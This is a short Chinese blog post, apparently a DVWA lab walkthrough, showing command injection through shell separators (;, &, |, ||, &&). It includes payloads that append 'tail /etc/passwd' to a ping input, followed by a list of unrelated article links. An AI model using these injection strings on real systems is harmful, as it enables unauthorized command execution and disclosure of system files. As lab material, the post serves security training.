当前位置:网站首页>DVWA 通关记录 2 - 命令注入 Command Injection
DVWA 通关记录 2 - 命令注入 Command Injection
2022-08-02 09:38:00 【InfoQ】
命令注入
分号 ;
ping 127.0.0.1;tail /etc/passwd
data:image/s3,"s3://crabby-images/71da2/71da2655c34f3cc3dc7a13fe31ea0d1dbe12ca26" alt="null"
|| 逻辑或
data:image/s3,"s3://crabby-images/45045/4504527333b6477517e8174760ad7f3b8d14786d" alt="null"
&& 逻辑与
data:image/s3,"s3://crabby-images/eb06d/eb06d798daccc9b6cbc1a35b01a567e9296319a2" alt="null"
& 后台执行
ping 127.0.0.1&tail /etc/passwd
data:image/s3,"s3://crabby-images/2ed2e/2ed2e503ec56cb19090cf7cbd72b31727a63dfa1" alt="null"
| 管道符
x|tail /etc/passwd|grep "www-data"
data:image/s3,"s3://crabby-images/4aead/4aeadc4c46ea7fa2d84dbca066988b35e4ccd5c0" alt="null"
边栏推荐
猜你喜欢
随机推荐
动态规划每日一练(2)
曲折的tensorflow安装过程(Tensorflow 安装问题的解决)
软件测试与质量 之白盒测试
MySQL安装与卸载详细教程
Pytorch的LSTM参数解释
Rust 从入门到精通03-helloworld
Openwrt_树莓派B+_Wifi中继
用了TCP协议,就一定不会丢包嘛?
第十五章 多线程
[Concurrent programming] - Thread pool uses DiscardOldestPolicy strategy, DiscardPolicy strategy
AlterNET Studio用户界面设计功能扩展
Re23:读论文 How Does NLP Benefit Legal System: A Summary of Legal Artificial Intelligence
Have you ever learned about these architecture designs and architecture knowledge systems?(Architecture book recommendation)
Daily practice of dynamic programming (3)
node制作一个视频帧长图生成器
每天花2小时恶补腾讯T8纯手打688页SSM框架和Redis,成功上岸美团
It's time for bank data people who are driven crazy by reporting requirements to give up using Excel for reporting
2022.7.25-7.31 AI行业周刊(第108期):值钱比赚钱更重要
牛客网项目17节生成验证码 刷新验证码一直没反应
The k-nearest neighbor method in the notes of Li Hang's "Statistical Learning Methods"